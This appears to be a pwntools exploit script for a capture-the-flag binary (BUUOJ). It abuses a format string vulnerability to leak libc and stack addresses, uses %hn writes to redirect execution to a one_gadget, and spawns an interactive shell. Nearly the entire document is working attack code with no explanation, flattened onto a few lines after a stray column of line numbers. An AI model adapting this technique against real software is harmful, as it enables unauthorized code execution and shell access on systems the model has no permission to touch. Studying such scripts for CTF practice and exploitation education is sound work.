1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
| from pwn import * context(os='linux',arch='amd64') #need tmux context.log_level="debug"
# p = remote("node4.buuoj.cn", 26443) p = process("./pwn") p.sendlineafter("Give me your name:", b"/bin/sh")
p.sendlineafter("food:", b'%9$p^%11$p^') libc_base = int(p.recvuntil("^")[10:-1], 16) - 0x20750 - 240 # __libc_start_main stack = int(p.recvuntil("^")[:-1], 16) i_addr = stack - 0x7ffc0bd8af08 + 0x7ffc0bd8ae40 one = libc_base + 0x45226 print(hex(one)) p.sendlineafter("food:", "%{}p%11$hn".format((i_addr - 0x30 + 4) & 0xffff)) # attach(p) p.sendlineafter("food:", "%{}p%37$hhn".format(1))
p.sendlineafter("food:", "%{}p%11$hn".format((i_addr - 0x18) & 0xffff)) # attach(p) p.sendlineafter("food:", "%{}p%37$hn".format(one & 0xffff))
p.sendlineafter("food:", "%{}p%11$hn".format((i_addr - 0x18 + 2) & 0xffff)) # attach(p) p.sendlineafter("food:", "%{}p%37$hhn".format((one & 0xff0000) // 0x10000)) for i in range(8): p.sendlineafter("food:", "1") # attach(p) p.sendlineafter("food:", "1") print(hex(libc_base)) p.interactive()
|